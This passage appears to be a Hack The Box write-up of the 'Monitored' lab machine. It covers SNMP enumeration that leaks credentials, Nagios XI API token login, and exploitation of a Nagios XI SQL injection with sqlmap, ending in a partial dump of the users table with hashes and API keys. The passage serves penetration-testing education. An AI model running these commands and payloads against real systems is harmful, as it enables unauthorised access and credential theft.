commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK | Not valid before: 2023-11-11T21:46:55 |_Not valid after: 2297-08-25T21:46:55 | tls-alpn: |_ http/1.1 |_http-title: Nagios XI |_ssl-date: TLS randomness does not represent time 5667/tcp open tcpwrapped Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.36 seconds</code></pre></div> <p>UDP scan (top 100 ports):</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ sudo nmap -sU --top-ports 100 10.10.11.248 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 01:45 EDT Nmap scan report for monitored.htb (10.10.11.248) Host is up (0.045s latency). Not shown: 96 closed udp ports (port-unreach) PORT STATE SERVICE 68/udp open|filtered dhcpc 123/udp open ntp 161/udp open snmp 162/udp open|filtered snmptrap Nmap done: 1 IP address (1 host up) scanned in 117.21 seconds</code></pre></div> <p>I added <code class="language-text">nagios.monitored.htb</code> to <code class="language-text">/etc/hosts</code> and visited <code class="language-text">https://nagios.monitored.htb</code> which was the welcome page for Nagios XI:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 577px; " > <a class="gatsby-resp-image-link" href="/static/3fb67126e87280bf8432a3f238593b2a/1d708/nagios-xi-welcome.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 64.55696202531645%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABZklEQVR42s2SzU4CMRSF52n4m6VvoOION7wGkLhz6US3LHgDNyYawju4kARXGjU+gNEwnZGBAG1npj/HtiIRQgyJLmzy5fS26bn35tarVquo1+s4rNWwu3cAf2cfhUIBpVIJ5XJ5RdcpFotOK5WKw/d9eEEQoNPpoN1u4yQ4xdHxGZrN5pJGo7ESr99ZWq3WEk8phSRJMJlMMJvNIKXAb5YnhMDd/SMenp4d8WiMPBfIstSQIU1T2KRbGwIaSmaQghs1jwUFnU8xNdXaim3lNunWhmkO9AYSV32J3q3ExY3EW6LdpdabH+kFGw15rnHZ/zTqDhTOryVe3n823KJl5lqWOTMtc3DOwDgHY8xBKUVqYsoz0AyYpwAzqjYk9LQpYzgkIFGMYUgQkgjEEEURwjA0e4I4jp0SEiNMOF5HMGiM5waqXYJvFcJ8FbmCnaodxNfeqosXZ8IMXUggXyDUmuFfrv9v+AETvqzAPXYMcwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI welcome page" title="" src="/static/3fb67126e87280bf8432a3f238593b2a/1d708/nagios-xi-welcome.png" srcset="/static/3fb67126e87280bf8432a3f238593b2a/dda05/nagios-xi-welcome.png 158w, /static/3fb67126e87280bf8432a3f238593b2a/679a3/nagios-xi-welcome.png 315w, /static/3fb67126e87280bf8432a3f238593b2a/1d708/nagios-xi-welcome.png 577w" sizes="(max-width: 577px) 100vw, 577px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Clicking "Access Nagios XI" brought up the login page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6ef6bda0e1bee938a300dd0c314765fb/384bf/nagios-xi-login.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 68.9873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACBUlEQVR42p1TSW7bQBDUNYBIcRM53IaLuIiLKCKSEUmGDzaS2MopSALkZOT/r6h0jyHBjuWDcyh0g9OoqeopTo7HB9zefcUwXmG16tH3PdWVAvfDsMY4rrFeUyXwzDCsznVNGIbh6XwcMTFNEwzDMOD7PpIkUZUhhFBwnDnmroDtuHBFBBGm8KMcQUSzUYoTB+NMOJvNUJYLuq2HlBJpmqKsKtQEh4jKZsSv34/48u0nbu+/Y3M4QpYbpMtPsCybOIyXhAYRyrRCmFQwjRmROCiKAhURui4p80h9VsEPMzoTMOwAmunBov6VQsuyoE8/oNk+4OrzH1JVYLlsUNc1EdYQnodFvUKeFwgCWkEskMUuqtSjVZmXLasdBj6iNIfrh/B8gSiKFBzHxqK7hkwKyEwi3C6x7STuNglmhnVJoQmNLO+7Hj8+tri/ucE1vZiu6+oidtC1Db16R8qXaEh1RQ4kXc6r4ZmLCpMoRk/qxqJEneXnQSbkSBwOB+z3e+x2O6o7DBQt27YvW2bopHJKDzLVNWik7vSdCTlOcRzDo31ypObzuVLHZ28S8iHbf6rWWTmr4BfnfYZhCEGEcSwpo/4Lu68I34JtW4hiCjEF2gsSuEFO4c6ozyli/0H4HP8qOrk5OZpomqb+kveCE3CqzzFp25Z+uVLt6D1Q8WkaBebouk71fwE8W3BkYCr8GAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI login page" title="" src="/static/6ef6bda0e1bee938a300dd0c314765fb/50637/nagios-xi-login.png" srcset="/static/6ef6bda0e1bee938a300dd0c314765fb/dda05/nagios-xi-login.png 158w, /static/6ef6bda0e1bee938a300dd0c314765fb/679a3/nagios-xi-login.png 315w, /static/6ef6bda0e1bee938a300dd0c314765fb/50637/nagios-xi-login.png 630w, /static/6ef6bda0e1bee938a300dd0c314765fb/fddb0/nagios-xi-login.png 945w, /static/6ef6bda0e1bee938a300dd0c314765fb/384bf/nagios-xi-login.png 1175w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I tried the default Nagios credentials of <code class="language-text">nagiosadmin:PASSW0RD</code> which didn't work, I also couldn't find a version number:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 340px; " > <a class="gatsby-resp-image-link" href="/static/87e51981dfbe06394bf21704c75678d2/32dd0/nagios-xi-login-default-creds.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 80.37974683544303%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACT0lEQVR42p2Ty2sTURTGs0pCG12YTDPJTGYmk3nnIbZSULQoCdUKUje2igu1JCViwEfTpLpwJUiRYqIBBbUIqQXFta/6WGTlwqX/hYhR0JV+nhmTQFJbTBe/e8+9M/e737nnXpeqqpBlGZIkOcRiMWiatmVcyWQSh8fHcXJ6GrlsFpl0GhptYpkmTMP4bwzCETRp4fDoKDITEzgyOQkzlUJYFMGTWz4aBUd9G3u8EQJl6Qhqqobrx09gdTaP5Zkc6rk8Vs8VuskX1s+1eJw/j2eFC1g6dRqyosClazo+3ljE74cP8LlSQbN2B1+rVTRvV/Hz3l00Kf5WuYXvtRqwUm+x0uFXncZPn+DT4hJEcukI3p+ZxfvSAp5fnMOLS0W8mivhdbGEtfkyXlLcHr8rXcHb+QW8KZY7rNG3RvkqlrN5RKmgLjtvPiIQIiKC5BBkQ2CGgggwQadv4w8wCHM8pabSYqULO13nDO1rI0YiSCXiiFOBbIJMANsGB7Hd5+vCNzAALsQiGbfoP6MLq11lTdcgiBLYUBgsOWNZFjzPI0Kb9GLPR6miuq5vfA9th2yQUgkNgedC8Pt3wOPxwOv1rsPtdoNhmM6d+6eg3UTVBCJyEqKSgkBnyPOc46YXjuOc17SpQ00zcOhyA2drPzB18wtSe49BV0QYpuU46WUzsZagjrEzjzB17QOOlhqwRjJQZAEqzdvH0fdbthtVkRGVRMRkCfYGmm5CNyyn71+QUrB27Udidxrx4TGK9yE+cpDiAzB37tmaw7/0no3aoj/BP+M8FBMZYNd3AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI default creds" title="" src="/static/87e51981dfbe06394bf21704c75678d2/32dd0/nagios-xi-login-default-creds.png" srcset="/static/87e51981dfbe06394bf21704c75678d2/dda05/nagios-xi-login-default-creds.png 158w, /static/87e51981dfbe06394bf21704c75678d2/679a3/nagios-xi-login-default-creds.png 315w, /static/87e51981dfbe06394bf21704c75678d2/32dd0/nagios-xi-login-default-creds.png 340w" sizes="(max-width: 340px) 100vw, 340px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Since port 389 was open, I used <code class="language-text">ldapsearch</code> to fetch LDAP info, but there wasn't anything interesting:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ ldapsearch -x -H ldap://10.10.11.248 -b "dc=monitored,dc=htb" # extended LDIF # # LDAPv3 # base &lt;dc=monitored,dc=htb> with scope subtree # filter: (objectclass=*) # requesting: ALL # # monitored.htb dn: dc=monitored,dc=htb objectClass: top objectClass: dcObject objectClass: organization o: monitored.htb dc: monitored # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1</code></pre></div> <p>Referring to the Nmap UDP scan, port 161 (SNMP) was open, so next I enumerated SNMP. The community string "public" was valid, allowing me to retrieve SNMP data using <code class="language-text">snmpwalk</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ snmpwalk -v2c -c public 10.10.11.248 > snmp_output </code></pre></div> <p>In the output, I found credentials for the <code class="language-text">svc</code> user passed as command-line arguments to a script running with <code class="language-text">sudo</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">&lt;...snip...> iso.3.6.1.2.1.25.4.2.1.5.575 = STRING: "-u -s -O /run/wpa_supplicant" iso.3.6.1.2.1.25.4.2.1.5.582 = STRING: "-f" iso.3.6.1.2.1.25.4.2.1.5.602 = STRING: "-c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB " iso.3.6.1.2.1.25.4.2.1.5.710 = "" iso.3.6.1.2.1.25.4.2.1.5.711 = "" &lt;...snip...></code></pre></div> <p>Attempting to log in to Nagios with the credentials <code class="language-text">svc:XjH7VCehowpR1xZB</code> showed the following message:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 340px; " > <a class="gatsby-resp-image-link" href="/static/bae55c67487a27a6a86853483e97e896/32dd0/nagios-xi-login-svc-creds.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 84.81012658227847%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACUUlEQVR42p2UvU8UQRjGaTg4Eokc533t1+3XzO4e5hQtCMEYwQCJhSYnRgsSDR8XSKxOQelI8KLcARUkeJgINv4NggWNpbHQ3kaiBGksNDH6+M4eED5yCBS/ed+Z2Xn2mZ13p8q2bei6Dk3ToKoqDMMAY+zEVKVSKXR1dqInk8HgwACutrf7E57rwnWcI+MQvqBILrS0oL27G9d7euCm04iR0zg5PioxQkomy4LMZhjP3MJSfxYLd/vwkuKr7PAhDO3pLw4O4fXwfUze6YVhWSTIOD5M5PFzbhbfpqbwtVDA2mQB32dmsDE9jU2K68Win2/HNXrmy7NJbNCcWPNrbg6fnjyFRt+/ipPg+/EJGpzF53we61NFYGEBf0slwOc59bfzkj+306f4R8SlRXzcLTh/bwCro2NYfvgIK8TbkccVEfPLD0Z3eJMb8de+6MtCN02xZYaYJKExEkV9QyPqQ43luJtQmVOnQzgTi0M1TCi6sQeNxvxDEXUoyzIS8TiCwSDq6uoqUltbi2g0Atd1wDk7QPmUqdG0JBIJCbKiQlGUiogXi5+Ac165sEUTjYTJYQSyFEMo1IBAIICampoDVFdXIxwO7xRxRUGDNUEx00jaaajkVqZvKtzsR6LxJBXwfxw66Mq9Q//8b9ye/oGzrTfALQ2O6/lO9nOY2JYgR1tvCTfHVnEttwKvuQOWocBmNsSBHftyEI1t6rQVuml0FYyTC7cJ3BF4JxHk8M5fQtPFDqSaL8M714aUn1+Bl249mUNmW1uYfrQp2hbdi5Z5bMF/T8VJoKtT/G8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI svc creds" title="" src="/static/bae55c67487a27a6a86853483e97e896/32dd0/nagios-xi-login-svc-creds.png" srcset="/static/bae55c67487a27a6a86853483e97e896/dda05/nagios-xi-login-svc-creds.png 158w, /static/bae55c67487a27a6a86853483e97e896/679a3/nagios-xi-login-svc-creds.png 315w, /static/bae55c67487a27a6a86853483e97e896/32dd0/nagios-xi-login-svc-creds.png 340w" sizes="(max-width: 340px) 100vw, 340px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Trying with another password showed a different message:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 340px; " > <a class="gatsby-resp-image-link" href="/static/854e719ad232e620e39c4ba907582331/32dd0/nagios-xi-login-svc-invalid.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 80.37974683544303%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACO0lEQVR42p2UTWsTURSGs0pCDS5ik6ZzZzLJZL7HVK1SUCxSUoILRQq2Cl1osYaUFkTbJNaFKxGKFNMW6UItQtqC4g+oVkXIxo1L/4WIddGdvp57k0YSjdosnnvvOTPzznvul880TWiahmQyiUQigVQqBZ7rFJ/neTibzWJsdBT5XA7DmQxMw4DrOHBs+7+xCSHIB/0DAxgi0XMjI3D6+sBUFTK5lck1o34PHrcjTlUKQdMwce/iZWzkprA2MYnK9Tw2p2awmZ+u9YLplvgXG5R/OXMDi+NXoOk6fJZp4eP9Bfx4+gSfy2XsrKxgZ3mJWMbu6iq+LtG4/BDfKI/1Sp31Bt8rFL94jk8Li1DJpRB8fC2H96V5bN0q4NVsEa/namwXStiapVw9flecx9vCbbyZKzXYpverpTtYm8wjSQvq43XLShyxXoZItKeZSHN8qDsCiclUmkEf603wcsUcGrSiqqJAkRkOhg4QobaEurrAemNIey48x27C3Vtl3qhqApLEyKkCWZah8B/8Af6M71fLstrvQ970RLshxaJgUgzhcBiBQADBYPA3/H4/TUOksefaCiYND4qWhqqnEY/TfqPyuZtWGGPiNP3DoY3szSomHu1i7MEXpE9egKWrsB1XOGnlb2J1QQuDV5/h0t0POF+swj0+DF1TYFCeL9i+zzJvDD0lJjul8QknF44Hy3Zp7HYiaME9NojDJzLw+s/APXoanhgPwT1yqjOHpqGLG6bW61QqXWECfd+CPwGZtBLp4GSENgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI svc invalid login attempt" title="" src="/static/854e719ad232e620e39c4ba907582331/32dd0/nagios-xi-login-svc-invalid.png" srcset="/static/854e719ad232e620e39c4ba907582331/dda05/nagios-xi-login-svc-invalid.png 158w, /static/854e719ad232e620e39c4ba907582331/679a3/nagios-xi-login-svc-invalid.png 315w, /static/854e719ad232e620e39c4ba907582331/32dd0/nagios-xi-login-svc-invalid.png 340w" sizes="(max-width: 340px) 100vw, 340px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So it seemed as though the account had been disabled and therefore the credentials couldn't be used to access the web interface. However, Nagios XI installations also include an API with an endpoint for authentication located at <code class="language-text">/nagiosxi/api/v1/authenticate</code>. A web search for Nagios API authentication brought up <a href="https://support.nagios.com/forum/viewtopic.php?p=310411#p310411" target="_blank">this</a> forum post which gives an example of how to authenticate to the API to obtain an authentication token. Using the <code class="language-text">svc</code> user's credentials, I sent the following command and received an <code class="language-text">auth_token</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ curl -X POST -k -L "http://nagios.monitored.htb/nagiosxi/api/v1/authenticate" -d "username=svc&amp;password=XjH7VCehowpR1xZB&amp;valid_min=5" | jq % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 201 100 151 100 50 782 258 --:--:-- --:--:-- --:--:-- 1046 { "username": "svc", "user_id": "2", "auth_token": "1b1f45e15a2a06227b8371765c3dd86558d988af", "valid_min": 5, "valid_until": "Sun, 27 Oct 2024 04:43:45 -0400" }</code></pre></div> <p>I was then able to authenticate to the web interface by appending the authentication token as the <code class="language-text">token</code> parameter to the login URL:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">https://nagios.monitored.htb/nagiosxi/login.php?token=1b1f45e15a2a06227b8371765c3dd86558d988af</code></pre></div> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/df79f295e76812b1635b7905e0ab32cd/e9794/nagios-xi-svc-dashboard.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 58.86075949367089%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACTElEQVR42lWSy24TUQyG5wUgSRESSeZG5j6TuZ25NQ0qaYoEStoiobTbLgAVWEARQuJZ0k2gSCx4yB/7TBKJheUzts9/7M+jfLhe4eb6Eq8Xr7A4abBaPsdqMcNiVmM5b3B2UuN8XuPiRYOL09afkz+bVTL+5uUUV8tj6S/JK39/HOPP9yk2n0v8/FLj/tsU97clfn+t8Ou2xvomxPqthbt3NtZkd/+Zg7v3jjxvPgbYfBpDSdMM0XgMwzCgajoM8ykc14XnB7AdD73HT9DtHZA9Qqd7QNajcw+dTg8P6cyxB50uLMelex6UsiwhhIDjONA1DYOhijQvUFUlsiyFR+Kj0Ujm+VFdNyheoq4q1HWNOI7heR6CIIBG95Usy2TC930Z4AtRFCFJc/hBRK/6sG1bmpxiqOPoVKBscgR+iCRJpeB4HNNdvRXM8xwuddIK6rIgEw2SrEaUlIQkpge9tkPCEuchojiCZVmExpfeoZH3gu52LA5IQSoS1RFScYhxWpFgQjU8skmPqrAthzp2JAYW47uWZUNV1ZZhURQtw60gj58RxzQTCEmMl8YYTNPEYDAgP5Jng01y1aXnnMLjVgR4B5WTYRgiTnJYtguDvk3TkF3sllI1DSaTQ0ynU2pGyPokSWRe4e74dYa+H5kYJsUEefUM/FtxMWNhYXWoYTIXxDeR3Lh7l7dMopJhmqZ7FrvWuVshKoiClhK14zIGHpONtxsEoeTaLsWms992yEth465YsGVkyn9S1zVZxLbj1+/3W37b2G4q/ubcP/WEcDkBPAPOAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI svc dashboard" title="" src="/static/df79f295e76812b1635b7905e0ab32cd/50637/nagios-xi-svc-dashboard.png" srcset="/static/df79f295e76812b1635b7905e0ab32cd/dda05/nagios-xi-svc-dashboard.png 158w, /static/df79f295e76812b1635b7905e0ab32cd/679a3/nagios-xi-svc-dashboard.png 315w, /static/df79f295e76812b1635b7905e0ab32cd/50637/nagios-xi-svc-dashboard.png 630w, /static/df79f295e76812b1635b7905e0ab32cd/fddb0/nagios-xi-svc-dashboard.png 945w, /static/df79f295e76812b1635b7905e0ab32cd/e9794/nagios-xi-svc-dashboard.png 1009w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After logging in, the footer of the page had the version number:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 156px; " > <a class="gatsby-resp-image-link" href="/static/2500a9d1d83aeb04fb99dfc07cfb5dbd/28fe5/nagios-xi-version.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 21.153846153846153%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAj0lEQVR42pWPuwrEIBRE8z3GJKhVIG0aEXwUgo2aLpA65PNn8YLbbWCL4V4G5sAZlFKQUoIxhnEcv1mWBZxzTNOEeZ7ptq6lbX5lEEJg2zZc14WcM2qtKKVAa43jOJBSgrUWIQQYY6hvm1fguq44zxP3feN5HvpjjAT33hPEOUd33/d3YFfuqk2vK3fdf5Q/DH+H63PKorsAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI version" title="" src="/static/2500a9d1d83aeb04fb99dfc07cfb5dbd/28fe5/nagios-xi-version.png" srcset="/static/2500a9d1d83aeb04fb99dfc07cfb5dbd/28fe5/nagios-xi-version.png 156w" sizes="(max-width: 156px) 100vw, 156px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>A web search showed that Nagios XI version <code class="language-text">5.11.0</code> is affected by a known SQL injection vulnerability, <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-40931" target="_blank">CVE-2023-40931</a>. The NIST page references <a href="https://outpost24.com/blog/nagios-xi-vulnerabilities/" target="_blank">this</a> blog post which provides more detail on the vulnerability.</p> <p>So based on the blog post, I used Burp Suite to send the following POST request to <code class="language-text">/nagiosxi/admin/banner_message-ajaxhelper.php</code> with the POST data of <code class="language-text">action=acknowledge_banner_message&amp;id=3'</code> which responded with a SQL error, confirming the SQL injection vulnerability:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d850a02eb9dba4e6ab25c4ae08387fb2/b3720/nagios-xi-sql-injection.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 42.405063291139236%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABOElEQVR42pWS63KDIBCFfZxEUJCLEASMJk3a93+g013S9DLTH+2Pb5RxOXv2rF0IAbP3mKYJw6gw/mCE9gnDMKDmBTFGKD1Ba41RKUgp2zcpB9hywxwiurRkXC5XbNuOei5IOSImDz87GGObgBA91lqx7RfkUhpLLrDOQykW15BCQlCDrp43XO9vWLczFSXqwmIezjsS0yQmGktZsd/uyLmi1Ey1EWmh6YKBcxbW2ua2M9bB0mXjNIwl3ES4NtJz9GEYcUoJl9sr9usL1nVFCHODxTguYwy5Vei4e9/3n05E/4H4QhKnhTJMCzkKjwwpX4bvHg6HxvF4RMfBfr/8O5JEFCI58rTAeX48eaE8Kp8ZbvBHQQFFxbXk5pDFnrCgo4j+LWitoZymtlXOinPj0fldqccvxkt5BzES/QZkl2vWAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI SQL injection" title="" src="/static/d850a02eb9dba4e6ab25c4ae08387fb2/50637/nagios-xi-sql-injection.png" srcset="/static/d850a02eb9dba4e6ab25c4ae08387fb2/dda05/nagios-xi-sql-injection.png 158w, /static/d850a02eb9dba4e6ab25c4ae08387fb2/679a3/nagios-xi-sql-injection.png 315w, /static/d850a02eb9dba4e6ab25c4ae08387fb2/50637/nagios-xi-sql-injection.png 630w, /static/d850a02eb9dba4e6ab25c4ae08387fb2/fddb0/nagios-xi-sql-injection.png 945w, /static/d850a02eb9dba4e6ab25c4ae08387fb2/b3720/nagios-xi-sql-injection.png 992w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I used <code class="language-text">sqlmap</code> to start enumerating the database. <code class="language-text">sqlmap</code> confirmed the vulnerability in the <code class="language-text">id</code> parameter:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&amp;action=acknowledge_banner_message" -p id --cookie "nagiosxi=lvdk2h40oc70tl1b8v94r28led" --batch --threads 10 &lt;...snip...> POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 260 HTTP(s) requests: --- Parameter: id (POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (8623=8623) THEN 3 ELSE (SELECT 5042 UNION SELECT 4628) END))&amp;action=acknowledge_banner_message Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=3 OR (SELECT 5963 FROM(SELECT COUNT(*),CONCAT(0x716b717171,(SELECT (ELT(5963=5963,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&amp;action=acknowledge_banner_message Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=3 AND (SELECT 1164 FROM (SELECT(SLEEP(5)))BVNf)&amp;action=acknowledge_banner_message --- &lt;...snip...></code></pre></div> <p>Running <code class="language-text">sqlmap</code> with the <code class="language-text">--dbs</code> option showed two available databases, <code class="language-text">information_schema</code> and <code class="language-text">nagiosxi</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&amp;action=acknowledge_banner_message" -p id --cookie "nagiosxi=lvdk2h40oc70tl1b8v94r28led" --batch --threads 10 --dbs &lt;...snip...> available databases [2]: [*] information_schema [*] nagiosxi &lt;...snip...></code></pre></div> <p>To list all the tables in <code class="language-text">nagiosxi</code>, I used the <code class="language-text">-D nagiosxi --tables</code> options:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&amp;action=acknowledge_banner_message" -p id --cookie "nagiosxi=lvdk2h40oc70tl1b8v94r28led" --batch --threads 10 -D nagiosxi --tables &lt;...snip...> Database: nagiosxi [22 tables] +-----------------------------+ | xi_auditlog | | xi_auth_tokens | | xi_banner_messages | | xi_cmp_ccm_backups | | xi_cmp_favorites | | xi_cmp_nagiosbpi_backups | | xi_cmp_scheduledreports_log | | xi_cmp_trapdata | | xi_cmp_trapdata_log | | xi_commands | | xi_deploy_agents | | xi_deploy_jobs | | xi_eventqueue | | xi_events | | xi_link_users_messages | | xi_meta | | xi_mibs | | xi_options | | xi_sessions | | xi_sysstat | | xi_usermeta | | xi_users | +-----------------------------+ &lt;...snip...></code></pre></div> <p>The <code class="language-text">xi_users</code> table seemed interesting, so I retrieved the data with <code class="language-text">--dump</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&amp;action=acknowledge_banner_message" -p id --cookie "nagiosxi=lvdk2h40oc70tl1b8v94r28led" --batch --threads 10 -D nagiosxi -T xi_users --dump &lt;...snip...> Database: nagiosxi Table: xi_users [2 entries] +---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+ | user_id | email | name | api_key | enabled | password | username | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket | last_edited_by | login_attempts | last_password_change | +---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+ | 1 | admin@monitored.htb | Nagios Administrator | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1 | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0 | 1701931372 | 1 | 1701427555 | 0 | 1730011393 | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0 | 5 | 4 | 1701427555 | | 2 | svc@monitored.htb | svc | 